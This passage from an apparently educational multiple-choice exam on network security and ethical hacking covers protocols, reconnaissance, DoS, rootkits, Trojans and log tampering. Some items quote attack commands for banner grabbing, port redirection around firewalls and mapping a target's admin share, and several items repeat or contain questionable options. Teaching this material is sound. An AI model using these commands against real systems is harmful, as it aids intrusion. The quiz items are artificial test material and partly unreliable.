c) crack password by using a combination of limited dictionary cracks and brute force cracking.
d) crack password based on hybrid characters.

4. A type of software that repairs security flaws in an application is called a(n) ________.
a) hot fix
b) exploit
c) repair
d) patch

5. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?
a) tracert
b) ipconfig
c) ping
d) nslookup

6. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

7. The following are methods employed to uncover system vulnerabilities except ______.
a) IP Address scanning
b) Manual vulnerability probing
c) Traffic monitoring
d) Vulnerability scanning

8. Which of the following statements are TRUE about Computer Misuse Act (Cap 50A)?
i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

9. Which of the following event file is used to stores security-related events like failed logon attempts, policy changes, and attempts to access files without proper permission in Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

10. Which of the followings are the common techniques used by sophisticated hacker for covering track and hiding in a compromised system? i. Hiding evidence by altering event logs; ii. Creating difficult to find files and directories; iii. Hiding evidence on the network: Covert Channels; iv. Deleting log files.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

11. Which of the following NOT common activity for Scanning?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

12. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer,
Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

13. Which application analyses surfer's shopping habits, interests and inserts Pop-up advertisement?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

14. Which method is NOT used as maintaining access attacks?
a) Trojan Horses
b) Big Worms
c) Backdoors
d) Rootkits

15. A situation in which a program or process attempts to store more data in a temporary data storage area than it was intended to hold is known as a what?
a) Buffer overflow
b) Denial of service
c) Distributed denial of service
d) Storage overrun

16. The following are payloads provided by Metasploit to foist on the target machine except _____.
a) Create new user accounts
b) Bind shell to current port
c) Windows VNC Server DLL Inject
d) Inject DLL into running application

17. Which information directory protocol is the standard for file transfer over the Internet?
a. TCP
b. UDP
c. FTP
d. HTTP

18. Which of the following is Not the correct defense method against User-Mode Rootkits?

a)Never let attackers get Administrator right to the system.
b) Install MD5 & SHA-1.
c) Install Tripwire.
d) Install latest operating system patches.

19. If the attack is SYN flood, which of the following category of Denial-of-Service attack it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

20. Identify which category of Denial-of-Service attack if the attack is Smurf.
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

21. Which of the following is the correct sequence of phases of hacker’s attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

22. Ethereal is a software tool used to ______ between client and server machine.
a) test the physical connection
b) test the functionality of ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

23. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

24. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

25. Which of the following is not one of the IP address ranges reserved for private use by RFC 1918?
a) 10.0.0.0-10.255.255.255
b) 192.168.0.0-192.168.255.255
c) 169.254.0.0-169.254.255.255
d) 172.16.0.0-172.31.255.255

Question 26 4 points Save An attacker can gain access to very sensitive information about an organisation through the following except _________.
a) Social engineering
b) Physical break-in
c) Dumpster diving
d) software engineering

27. What is the information can be gathered by an attacker by typing the
following command using Netcat? C:> nc www.sp.edu.sg 80 <press Enter> HEAD / HTTP/1.0 <press Enter> <press Enter>
a. Domain Name
b. Web Server version
c. Administrative Contact Number
d. Netblock Owner

28. For DoS (Denial-of-Service) Attack, Resource Exhaustion can be achieved by: i. Spawning processes to fill the process table ii. Filling up the whole file system iii. Packet floods iv. Malformed packet attacks
a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

29. What type of attack attempts to use every possible key until the correct key is found?
a) Brute-force attack
b) Denial-of-service attack
c) Passive attack
d) Private key cryptography

30. Which of the following protocols should be disabled on a critical network device such as a router?
a) TCP/IP.
b) ICMP.
c) IPX/SPX.
d) RIP

31. Sending an e-mail from one address but making it seem as if it is coming from another is called ______________.
a) falsifing
b) telneting
c) exploiting
d) spoofing

32. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

33. Which of the following is a correct definition of a Trojan?
a) It needs no user intervention to replicate.
b) It sends messages to a computer with an IP address indicating that the message is coming from a trusted host.
c) It collects personal information or changes your computer configuration without appropriately obtaining prior consent.
d)It buries itself in the operating system software and infects other systems only after a user executes the application that it is buried in.

34. Password cracking involves _________________ .
a) stealing the encrypted password representations and trying to recover the original clear text password using an automated tool.
b) mounting a keylogger software in a computer to capture typed password.
c) guessing password using an automated tool.
d) password decrypting using an automated tool.

35. Which of the following is NOT a Distributed Denial-of-Service defenses?
a) Packet filtering Firewalls at DMZ
b) Limits Bandwidth
c) use egress Anti-Spoofing filters
d) Traffic shaping

36. Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?
a) DoS
b) Ping of death
c) Teardrop
d) Social engineering

37. Which of the following event file is used to stores events associated with application e.g. database, Web servers or user applications in Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

38. Windows s events information is constantly being written into:
i. SECURITY.LOG ;
ii. FILE.LOG;
iii. APPLICATION.LOG;
iv. SYSTEM.LOG.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. Most Application-layer protocols only use UDP or TCP at the Transport layer. Which of the following could use both?
a) TCP
b) Microsoft Word
c) Telnet
d) DNS

40. Which of the following is Not a feature of Windows User-Mode Rootkits?

a) Hiding files, processes, system services, system drivers, Registry keys and TCP/UDP ports.
b) Creating a remotely accessible command-shell backdoor, made invisible on the local system.
c) Activate the hidden system processes.
d) Lying to users about how much free space is available on the hard drive.

41. Which one of the following is not true about a web server?
a) The default port for a web server is port 80.
b) A web server must always run on port 80.
c) A commonly used alternate port for web servers is 8080.
d) The browser client must specify the port if not using well-known port 80.

42. A(n) _______ is a manner of manipulating software to result in undesired behaviour.
a) exploit
b) heap overflow
c) external probing
d) buffer overflow

43. Which of the following are the basic types of hackers attack?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a. i, ii and iii;
b. i, ii and iv;
c. i, iii and iv;
d. i, ii, iii and iv.

44. Which of the following event file is used to stores events associated with the systems functioning e.g. failure of a driver or inability of a service to start in Windows system?

a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

45. Which of the following protocol does Ethereal indicate when pinging a computer?
a) Internet Control Message Protocol (ICMP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Domain Name System (DNS)

46. The exploitation of resources can be performed in many ways. Some of the more common ways are:
i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a. i and ii;
b. i, ii and iii;
c. ii, iii and iv;
d. i, ii, iii and iv.

47. Which of the following is the type of algorithm used by MD5?
a) Block cipher algorithm
b) Hashing algorithm
c) Asymmetric encryption algorithm
d) Cryptographic algorithm

48. Which are the other three of the SIX common techniques can be applied to mount an effective defence against the attacks from having the ability to alter logs?
 Activate Logging
 Setting Proper Permissions
 Using a Separate Logging Server

i. Encrypting Log Files
ii. Making Log Files Append Only
iii. Protecting Log Files Using Write-once Media
iv. Renaming Log Files

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) ii, iii and iv.

49. What is the meaning of Anonymizing HTTP Proxy?
a) Allow the attacker to surf the web as an anonymous user.
b) Allow the attacker to surf the Web without revealing the attacker's location.
c) Allow the attacker to surf the web without revealing the attacker's user account.
d) Allow the attacker to surf the web without revealing the attacker's HTTP sequence number

50. Which of the following is FALSE?
a) TCP Connect is also know as Full Open Scan;
b) TCP SYN is also know as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans.

51. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

52. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

53. Consider the situation in which an intervening entity such as a firewall blocks direct access to a target system. Resourceful attackers can find their way around these obstacles using .
a) denial-of-Service
b) port redirection
c) telnet
d) ftp

54. Which of the following is Not the correct method to defense against bots, backdoors & spyware?
a) Use Antivirus and Antispyware Tools
b) Looking for Unusual TCP and UDP ports
c) Knowing Your hardware
d) Knowing Your Software

55. Which of the following is a class C address?
a) 128.10.54.120
b) 92.200.138.24
c) 168.28.10.165
d) 193.10.160.45

56. The most popular techniques for launching packet floods are:
i. Bonk;
ii. SYN floods
iii. Smurf attacks
iv. Distributed DoS attacks

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

57. What does it mean when running the following command at PC 192.168.1.2? winrelay –lip 192.168.1.2 –lp 4000 –dip 192.168.1.23 –dp 5000 –proto tcp
i. It is a Trojan horse;
ii. PC 192.168.1.2 has been setup to listen to port 4000;
iii. The traffic arrives at port 5000 will be redirected to port 4000;
iv. PC 192.168.1.23 is the destination where the traffic will go to.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

58. Which of the following SuperScan4's tool is used to uncover the users account list?
a) Host and Service Discovery
b) Users Discovery
c) Scan Options
d) Windows Enumeration

59. Starting with Windows XP Service pack 2 and Windows Server 2003 Service Pack 1, Microsoft's OS provides a feature called _____________ to support non-executable stack or heap pabilities.
a) Stack Overflow Prevention
b) Data Execution Prevention
c) Buffer Overflow Prevention
d) Memory Execution Prevention

60. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?
i. Names
ii. Emails
iii. Technologies
iv. Current events / Recent happenings

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

61. Which appllication-level Trojan backdoor is able to grab keystrokes from the user and sending them back sensitive information to the attacker?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

62. Which of the following is FALSE?
a. There are five Regional Internet Registries (RIR) under Address Supporting Organization
b. Domain name registrations are handled by Internet Corporation for Assigned Names and Numbers (ICANN)
c. Each RIR maintaining a whois database holding details of IP address registrations in their regions
d. ICANN is responsible for coordinating the management of the technical elements of the DNS to ensure universal resolvability so that all users of the Internet can find all valid addresses

63. Which of the following is a known Kernel-Mode Rootkits software tool?
a) FU Rootkit for Windows.
b) KM Rootkit for Windows.
c) SU Rootkit for Windows.
d) KU Rootkit for Windows.

64. Which of the following statement is FALSE about Covert_TCP?
a) The Covert_TCP’s covert channels are constructed by inserting data into unused or misused fields of TCP/IP headers
b) The Covert_TCP’s covert channels are constructed by embedding one protocol entirely in a different protocol
c) Covert_TCP allows for transmitting information by entering ASCII data in TCP/IP header fields
d) TCP/IP header fields used are: IP Identification, TCP sequence number and TPC acknowledgement number

65. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

66. Which of the following is commonly found to be a nonessential service on a web server?
a) Server service
b) DNS service
c) FTP service
d) Print spooler service

67. A _____ is an error condition in a software program that allows malicious code to be injected and put into operation without user intervention.
a) syntax overflow
b) semantic overflow
c) buffer overflow
d) software overflow

68. An attacker gathers the following types of reconnaissance data from company's own web site except _________.
a) hardware models
b) business partner
c) existing technologies
d) recent mergers and acquisitions

69. Which of the following is the best way to protect against security vulnerabilities within OS software?
a) Install the latest service pack.
b) Reinstall the OS on a regular basis.
c) Back up the system regularly.
d) Shut down the system when it is not in use.

70. Which of the following is the best method for preventing social engineering attacks?
a) User education
b) Security tokens
c) Biometric devices
d) Encryption

71.Which of the following protocols transmit sensitive information in clear text?
a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

72. Which of the following statements is FALSE?
a) TCP Packet includes two port numbers: a source port and a destination port
b) A TCP port with listening service is known as an reserved port
c) The TCP port number is a 16-bit numbers
d) There are 65,536 different TCP ports on each machines

73. Which of the following statement is FALSE?
a) The .EVT files are “locked” on a running Windows machine, and cannot be opened or edited with a standard file-editing tool
b) On Linux and Unix systems, the vast majority of log files are written in plain ASCII text
c) The main accounting files in Linux and Unix are utmp, wtmp and lastlog files
d) The .EVT files on Windows machine can be opened or edited with a standard file-editing tool

74. Each of the following is an OSI model protocol layer except ______________.
a) Software
b) Transport
c) Network
d) Physical

75. When a browser trying to contact a Web server, the client OS dynamically assigns a source port value of ______.
a) less than 1024.
b) greater than 80.
c) greater than 1023.
d) greater than 1024.

76. The primary goal of information security is to protect ______________.
a) procedures
b) people
c) information
d) products

77. Which of the following event file is the most often targeted because it contains the majority of the events that attackers wants to remove?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

78. For DoS (Denial-of-Service) Attack, Stopping service means:
a) crashing or shutting off a specific program or machine that users want to access;
b) stopping the computer from booting up;
c) shutting down the computer remotely;
d) stopping the network resource from being accessed.

79. Which is NOT a countermeasure of Buffer Overflow Attacks?
a) avoid sloppy programming
b) configure system with executable stack
c) implement strict control on unnecessary outgoing traffic from the network
d) apply patches to system

80. To protect the privacy of web surfing habits, which of the following should be deleted on a regular basis?
a) Download history
b) SSL certificates
c) Cookies
d) Plug-ins

81. In order to exploit RPC's vulnerability, the attacker would require the ability to send a specially crafted request to which three ports of the remote machine.
a) 135, 139 or 145
b) 21, 23 or 80
c) 21, 135 or 139
d) 135, 139 or 445

82. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

83. Which of the following statement is FALSE?
a) Covert channels often rely on technique called tunnelling, which allows one protocol to be carried over another protocol
b) Techniques for establishing covert channels across the network require both a client (attacker system)
and a server (victim system)
c) Loki and Reverse WWW Shell are widely exchanged within the computer underground based on tunnelling covert information techniques
d) Reverse WWW Shell utilises ICMP as a tunnel to carry on interactive communications with the backdoor listener

84.Which of the following is the correct sequence of phases of hackers attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

85. You need to allow only secure Internet traffic in and out of your company network. Which of the following ports would you open on the firewall?
a) 22
b) 53
c) 80
d) 443

86. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through i. Social Engineering; ii. Physical Break-in; iii. War Dialling; iv. Dumpster Diving.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

87. The attacker had managed to access the target system. Identify the command execution statement of
>net use z: \\192.168.1.2\c$ */u:student
a) check which network is connected to the Z drive of the target system.
b) check whether there is a network "student" which is connected to the z drive of the target system.
c) map the c drive of the target system to the z drive of the attacker.
d) map the attacker system's c drive to the z drive of the target system.

88. The objectives of port scanning are generally to identify one or more of the following: i. Open ports ii. Host operating system iii. Software or service versions iv. Vulnerable software versions (mst)
a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

89. Which of the following is the outcome of an Access Attack?
a. It is an attack against the confidentiality of the information
b. It is an attack against the integrity of information
c. It causes information to be unavailable
d. It is an attack against the accountability of information

90. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

91. When a threat uses vulnerability to attack a resource, some severe consequences can result in
i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a. i and ii;
b. ii and iii;
c. i, ii and iii;
d. None of the above.

92. Which layer of the OSI model is responsible for code and character-set conversion as well as recognizing data formats?
a) Application
b) Presentation
c) Session
d) Network

93. Nmap is able to provide the following types of scanning except ______.
a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

94. Which of the following Hacker Class is also known as “Cracker”?
a. Grey Hats
b. Red Hats
c. Black Hats
d. White Hats

95. Identify one method to defend against DDoS attack from locally stopping services?
a) Apply the principle of providing least privilege rights to user.
b) Implement per user limits on the consumption of file system space, memory and CPU usage.
c) Deploy some system monitoring software that can detect when system resources are running low.
d) Keep your system regularly patched and apply relevant security bug fixes.

96. You suspect one of your servers may have succumbed to a SYN flood attack. Which one of the following tools might you consider using to help confirm your suspicions?
a) Netstat
b) Ping
c) Tracert
d) Ipconfig

97. Which of the following is NOT the correct countermeasure against SYN flooding?
a) increase the size of connection queue
b) have redundant communication links to sensitive systems that must be all the time connected to the Internet.
c) use SYN cookies
d) Do not dole out user privileges carelessly

98. Which of the following is a probable cause of a hacker creating a back door in a system?
a) The hacker is trying to guess the credentials of the user.
b) The hacker is trying to get access without having to authenticate.
c) The hacker is trying to get personal information form the user over the phone.
d) The hacker is trying to connect to the user's wireless home network.

99.Which of the following are TRUE about a Script Kiddie?
i. With low-level hacking skills
ii. Use released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Use Social Engineering technique

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

100. Passwords can be intercepted as they move through networks via which of the following?
a) Keyboard sniffers
b) Password sniffers
c) Trojan horses
d) Cookies

101. Which of the followingis the process of identifying and reducing risk to a level that is comfortable and then implementing controls to maintain that level?
a) Return on investment
b) Risk
c) Risk analysis
d) Risk management

102. Which of the following is the best option for a network administrator to prevent attacker to figure out users' IDs or password?
a) Session Hijacking
b) URL Session Tracking
c) Disable cookies
d) Hidden form elements

103. Which of the following statement is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

104. TCP/IP family of protocols includes several components:
i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

105. Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
a) Web
b) DHCP
c) DNS
d) Database

106. ________ is the protocol Microsoft uses to share files, printers, and serial ports, and also to communicate between computers using named pipes.
a) Server Message Block (SMB)
b) Resource Control Block (RCB)
c) Traffic Message Block (TMB)
d) Communication Message Block (CMB)

107. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying message that network mapping tools rely on by using firewalls and the packet filtering router;
ii. Block incoming ICMP message;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. To prevent an attacker from discovering open ports on your
machine is to close all unused ports

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

108. You can start to build defenses for your information system by creating security ____________.
a) foundations
b) baselines
c) pillars
d) planes

109. Under Phase of Attacks, DoS (Denial-of-Service) Attack is considered as which phase?
a) Reconnaissance;
b) Scanning;
c) Gaining Access;
d) Maintain Access;

110. Which type of Buffer Overflow Exploits allows attacker to access the system as an impersonated root user?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

111. Which of the following techniques are considered as Malformed Packet DoS Attacks?
i. Land
ii. Ping of Death
iii. Rose
iv. Bonk

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

112. Running the following command at the PC with IP address 192.168.1.2. What does it mean? fpipe –l 1000 –r 5000 192.168.1.23
i. It is port redirection;
ii. Setup the PC (192.168.1.2) to listen to port 5000;
iii. PC 192.168.1.2 will pick up traffic entering at port 1000;
iv. The traffic arrives at port 1000 will be redirected to PC 192.168.1.23 at port 5000.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

113. You are the security administrator for a bank. The users are complaining about the network being slow. However, it is not a particularly busy time of the day. You capture network packets and discover that hundreds of ICMP packets have been sent to the host. What type of attack is likely being executed against your network?
a) Spoofing
b) Man-in-the-middle
c) DNS kiting
d) Denial of service

114. Which of the following is Not the functionality of BOTs software?
a) DoS flood
b) File morphing
c) Special UDP port scanning
d) E-mail address harvester

115. The File Transfer Protocol (FTP) can be accessed by each of the following except ________.
a) Web browser
b) FTP client
c) command line
d) LPTP server

116. The Transmission Control Protocol/Internet Protocol (TCP/IP) protocal that handles outgoing mail using port 25 is ______.
a) Simple Mail Transfer Protocol (SMTP)
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multipurpose Internet Mail Extensions (S/MIME)

117. What is the best measure to keep zombies off the system?
a) limits Bandwidth
b) install DDoS detection and throttling tools on your network
c) employ egress anti-spoof filters on external routers or firewall.
d) deploy filters upstream to block flood traffic.

118. Which of the following represent the pool of well-known ports?
a) 0 through 255
b) 0 through 1023
c) 0 through 49151
d) 1024 through 49151

119. To prevent an attacker from discovering open ports on your machine is to _______.
a) close all unused ports
b) assign strong passwords to all ports
c) hide all ports
d) terminate services on open ports

120. Which of the following advantages are associated with using a firewall?
a) It provides an inexpensive meansto share the Internet connection.
b) It is used to block undersired external access to internal network resources.
c) It is used to monitor the use of Internet by internal users.
d) It is used to hide the internal addressing scheme of the network.

121. After running John the Ripper, the cracked password is stored in a local file called ________.
a) John.pot
b) Ripper.pot
c) Password.pot
d) Crack.pot

122. General types of reconnaissance data can be obtained from Internet are:
i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

123. Internet search engines are used by attacker because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks

124. Which software tool can be used for cracking window95, window98, SQL2000, Cisco PIX, and router's MD5 hashes?
a) John the Ripper
b) Brutus
c) Super Cracker
d) Cain

125. An attack that opens numerous ports for bogus connections, thereby denying legitimate connections, is called a ______.
a) ACK Flood
b) TCP/UDP Flood
c) Port Flood
d) SYN Flood

126. Which of the following statements is FALSE about Risk Management?
a. Risk can be qualitatively defined in three levels: Low, Medium and High
b. Risk Management is about Security
c. Risk management determines the value of the resources and the level of security for it
d. Threat + Vulnerability = Risk

127. A(n) __________ is a weakness that allows a threat agent to bypass security.
a) vulnerability
b) exploit
c) risk
d) mitigation

128. Which of the following is an advantage of using virtual machines?
a) Reduces the need to install OS software updates.
b) Allows an OS to run in its own separate, secure area on a system.
c) Helps secure the hardware from unauthorized access.
d) Anti-virus software has to be installed only once.

129. A host has an IP address of 128.78.3.2. The network is subnetted by borrowing the first 3 bits of host address bits. What is the subnet mask for 128.78.3.2?
a) 255.255.224.255
b) 255.255.0.0
c) 255.255.255.224
d) 255.255.224.0

130. Each of the following protocols can be used to encrypt transmissions over the Internet except _________.
a) Common Gateway Interface (CGI)
b) Secure Sockets Layer (SSL)
c) Personal Communications Technology (PCT)
d) FORTEZZA

131. The following are commonly used techniques for reconnaissance except ________.
a) Low-technology reconnaissance
b) Web searches
c) Whois database analysis
d) High performance hardware

132. Which of the following IP address class is reserved for future use?
a) Class A
b) Class C
c) Class D
d) Class E

133. There are two ways that a SYN flood can exhaust the communication resources of a target:
i. Flood the connection queue;
ii. Flood the entire communication link;
iii. Flood the switch;
iv. Flood the router.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

134. Which of the followings are TRUE about DDoS (Distributed Denial-of-Service) attack?
i. Distributed Denial-of-Service is a simple SYN flood allowed an attacker to generate traffic from one machine
ii. The attacker first take over a large number of victim machines around the world, often referred to as zombies.
iii. The zombies software is the component of the DDoS tool that waits for a command from the attacker, who uses a client tool to interact with the zombies
iv. Tribe Flood Network 2000 (TFN2K) is one of the most fully featured DDoS-specific tool

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

135. What is the name of the unique physical address that is assigned to every network interface card?
a. IP address
b. Hostname
c. MAC address
d. NetBIOS name

136. What does an attacker do in Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack
ii. The core of Reconnaissance attack is intrusive information gathering techniques
iii. System is breached or accessed in order to retrieve information

a. i only;
b. i and ii;
c. i, ii and iii;
d. None of the above.

137. A(n) _______ identifies what program or service on the receiving computer is being accessed.
a) process
b) UPD designator
c) port number
d) service-initiated socket (SIS)

138. Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?
a) DoS
b) Masquerading
c) DDoS
d) Trojan Horse

139. Which of the following statements is FALSE about the key terms used in the risk management process?
a. A Resource is anything in an environment that trying to protect
b. A Threat is a resouce can be accessed by making use of a vulnerability in your environment
c. A Vulnerable is a point where a resource is susceptible to attack
d. Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

140. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

141. The qualities and characteristics of the network traffic generated by Nmap's ping scan are called its _________.
a) signature
b) socket
c) scan profile
d) stealth

142. Which of the following statements are TRUE about Trojan horse?
i. Most Trojan horse have two parts: Server and Client;
ii. The server-program part is a program or file that is installed on the victim’s machine;
iii. The client-program part is on the attacker’s system;
iv. Trojan horse attacks pose one of the most serious threats to computer security.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

143. An attacker normally takes inventory of which type of ports on the system?
a) well done ports.
b) easy ports.
c) open ports.
d) unsecured ports.

144. What is the usage of Cookie?
a) to prevent sniffing
b) to prevent ARP cache poisoning
c) to prevent spoofing
d) to prevent SYN flooding

145. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is connection protocol
b) Packet transmitted does not put in order
c) No packet lost retransmission
d) No acknowledgement or session tear down required

146. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.
a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

147. You connected your company to the Internet, and security is a concern. What should you install?
a) Higher-quality servers
b) Firewall
c) DNS
d) Switches

148. A port scanner has reported that your web server running with a supporting SQL database is listening on TCP ports 80, 443, 21, and 1433. Which of these ports is unnecessary and should be closed to prevent hacking attempts?
a) 80
b) 21
c) 1433
d) 443

149. Each of the following is intended to protect information except __________.
a) people
b) policies
c) equipment
d) confidentiality

150. Attacker can ask the server to send all information it has about a given domain through requesting a ________ from the name server.
a) domain transfer
b) nslookup
c) zone transfer
d) display all

151. Which application-level Trojan backdoor is able to modify or replace critical operating system executable programs or libraries?
a) Operating-Mode Rootkits
b) System-Mode Rootkits
c) User-Mode Rootkits
d) Kernel-Mode Rootkits

152. Each of the following is an attribute that should be compiled for hardware when performing an asset identification except __________.
a) the name of the equipment
b) the manufacturer's serial number
c) the MAC and IP address
d) the cost

153. Which of the following is not a well known TCP port number?
a) 8888
b) 53
c) 80
d) 25

154. An attacker with low skill level is called ?
a. Cracker
b. Hacker
c. Script Kiddie
d. Phreaker

155. _______ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet sniffing
b) Packet spoofing
c) Packet stealing
d) Packet engineering

156. The following are useful data elements from the Registrar of Whois Search except _______.
a) Names
b) Registration dates
c) Hardware models
d) Name servers

157. A person wishing to prevent users from accessing a web server and the information on it would try a ____ attack.
a) web service
b) denial of service
c) system service
d) internet service

158. Attackers known as ____________ like to think of themselves as an elite group who are performing a valuable service in identifying security weaknesses.
a) crackers
b) script kiddies
c) hackers
d) cyberterrorists

159. Which of the following is Not a functional feature of Kernel-Mode Rootkits?
a) Hide an attacker's processes.
b) Hide selected types of events from the Windows Event Viewer.
c) Hide the ports used by an attacker.
d) Hide device drivers, including itself, so an administrator cannot see them installed on the system.

160. Which of the following is not a feature or capability of a port scanner?
a) Determine open ports
b) Determine active services
c) Determine target OS
d) Determine weakness of OS

161. What is the purpose of a site survey?
a) Improve wireless signal strength
b) Eliminate unwanted access locations
c) Distribute WEP keys
d) Plan the design of a wired network

